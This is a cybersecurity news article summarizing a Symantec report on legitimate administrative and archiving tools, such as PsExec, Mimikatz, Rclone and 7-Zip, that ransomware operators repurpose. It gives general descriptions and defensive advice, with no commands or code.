Wednesday, December 11, 2024
Homecyber securityHackers Use Number of Legitimate Tools in Ransomware Attacks

Hackers Use Number of Legitimate Tools in Ransomware Attacks

Published on

SIEM as a Service

Ransomware attacks remain a formidable challenge for organizations worldwide.

These attacks not only encrypt critical data, rendering it inaccessible to the rightful owners but increasingly involve the exfiltration of sensitive information. 

This dual-threat approach amplifies the potential damage, as attackers not only demand ransom for the decryption key but also threaten to release the stolen data unless additional payment is made.

- Advertisement - SIEM as a Service

A critical aspect of these attacks that often goes unnoticed is the use of legitimate tools by hackers to carry out their nefarious activities.

Symantec researcher’s report delves into the phenomenon, highlighting the tools commonly repurposed by cybercriminals.

Data exfiltration refers to the unauthorized transfer of data from a computer or server.

In the context of ransomware attacks, it serves a dual purpose.

Initially, it adds an extra layer of coercion, as the attackers threaten to publish the stolen data if their demands are not met.

Secondly, it provides an additional revenue stream, as this data can be sold on the dark web or used in further targeted attacks.

The sophistication of these operations has increased, with attackers leveraging legitimate administrative and security tools to avoid detection and facilitate their malicious activities.

Document
Integrate ANY.RUN in your company for Effective Malware Analysis

Are you from SOC and DFIR teams? – Join With 400,000 independent Researchers

Malware analysis can be fast and simple. Just let us show you the way to:

  • Interact with malware safely
  • Set up virtual machine in Linux and all Windows OS versions
  • Work in a team
  • Get detailed reports with maximum data
  • If you want to test all these features now with completely free access to the sandbox: ..


List of Legitimate Tools Used in Ransomware Attacks

The use of legitimate tools by hackers complicates the detection and prevention of ransomware attacks.

These tools, designed for system administration, network management, and security assessments, are repurposed to conduct reconnaissance, gain persistence, escalate privileges, and exfiltrate data, reads Symantec report.

PowerShell: A powerful scripting language and command-line shell, PowerShell is often used by attackers for its ability to execute scripts and commands across the network, automate tasks, and manage configurations.

Its widespread availability on Windows systems makes it a favored tool for initiating attacks and moving laterally across networks.

PsExec: Part of the Sysinternals Suite, PsExec allows administrators to execute processes on other systems remotely.

Hackers use it to spread malware across networked computers, execute ransomware payloads, and maintain persistence within the compromised environment.

Mimikatz: This open-source utility is designed to extract plaintext passwords, hash, PIN codes, and Kerberos tickets from memory.

Attackers commonly use Mimikatz to escalate privileges and gain access to high-value targets within the network.

Cobalt Strike: Although intended as a security tool for penetration testers, Cobalt Strike has been adopted by cybercriminals for its robust set of features for network reconnaissance, exploitation, and the deployment of payloads.

Its beacon component is particularly useful for maintaining communication with compromised systems.

Rclone: Rclone is a command-line program to manage files on cloud storage. It has been repurposed by attackers for data exfiltration, leveraging its capabilities to efficiently transfer large volumes of data to cloud services under their control.

7-Zip: A file archiver with a high compression ratio, 7-Zip is used by attackers to compress stolen data before exfiltration.

This reduces the bandwidth required for the transfer and helps evade detection by minimizing the number of outbound connections.

WinRAR: Similar to 7-Zip, WinRAR is another compression tool used to package data before exfiltration.

Its widespread use and support for various compression formats make it a versatile tool for attackers.

Advanced IP Scanner: This network scanner allows for quick identification of all devices on a network.

Attackers use it to map out the network, identify potential targets, and plan their attack vectors.

The use of legitimate tools in ransomware attacks presents a unique challenge for cybersecurity professionals.

These tools are often whitelisted within organizations, making malicious activities harder to detect. 

It underscores the importance of robust network monitoring, the principle of least privilege, and continuous education on the evolving tactics of cyber adversaries.

By understanding the tools and methods used by attackers, organizations can better prepare their defenses against the multifaceted threat of ransomware.

With Perimeter81 malware protection, you can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits. All are incredibly harmful and can wreak havoc on your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Resecurity introduces Government Security Operations Center (GSOC) at NATO Edge 2024

Resecurity, a global leader in cybersecurity solutions, unveiled its advanced Government Security Operations Center...

Reserachers Uncovered Zloader DNS Tunneling Tactics For Stealthy C2 Communication

Zloader, a sophisticated Trojan, has recently evolved with features that enhance its stealth and...

US Charged Chinese Hackers for Exploiting Thousands of Firewall

The US Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned Sichuan Silence...

DMD Diamond Launches Open Beta for v4 Blockchain Ahead of 2025 Mainnet

DMD Diamond - one of the oldest blockchain projects in the space has announced the...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Reserachers Uncovered Zloader DNS Tunneling Tactics For Stealthy C2 Communication

Zloader, a sophisticated Trojan, has recently evolved with features that enhance its stealth and...

US Charged Chinese Hackers for Exploiting Thousands of Firewall

The US Treasury Department's Office of Foreign Assets Control (OFAC) has sanctioned Sichuan Silence...

DMD Diamond Launches Open Beta for v4 Blockchain Ahead of 2025 Mainnet

DMD Diamond - one of the oldest blockchain projects in the space has announced the...